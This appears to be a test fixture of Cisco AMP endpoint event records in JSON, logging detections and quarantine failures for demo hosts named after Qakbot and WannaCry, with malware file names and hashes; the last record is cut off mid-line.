+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412662850426241033","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"uqlq0o884.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\uqlq0o884.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281601187807000,"timestamp":1610647435,"timestamp_nanoseconds":891000000,"date":"2021-01-14T18:03:55+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419281601187807332","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281601187807000,"timestamp":1610647435,"timestamp_nanoseconds":891000000,"date":"2021-01-14T18:03:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-95.SBX.TG","detection_id":"6419281601187807332","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281588302905000,"timestamp":1610647432,"timestamp_nanoseconds":396000000,"date":"2021-01-14T18:03:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419281588302905443","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281588302905000,"timestamp":1610647432,"timestamp_nanoseconds":927000000,"date":"2021-01-14T18:03:52+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419281588302905443","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411538569722068995","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411538569722068994","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411538569722068993","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"Auto.BAC7BC5281.in10.tht.Talos","detection_id":"6411538569722068995","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"igvj$vN.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\igvj$vN.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"Auto.BAC7BC5281.in10.tht.Talos","detection_id":"6411538569722068994","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"6951045.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\6951045.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"Auto.BAC7BC5281.in10.tht.Talos","detection_id":"6411538569722068993","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff","sha1":"99fffe78e0cbd7b508eed13a8633903dd89ed5f1","md5":"dc41e47ebba549ec5e616ed9e88a0376"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":812000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275399255031906","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":297000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275399255031905","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":297000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275399255031904","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":297000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064606","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064605","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064607","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064604","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064603","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064600","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":812000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275399255031906","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":3200,"disposition":"Clean","file_name":"cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae","sha1":"ee8cbf12d87c4d388f09b4f69bed2e91682920b5","md5":"ad7b9c14083b52bc532fba5948342b98"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":235000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat 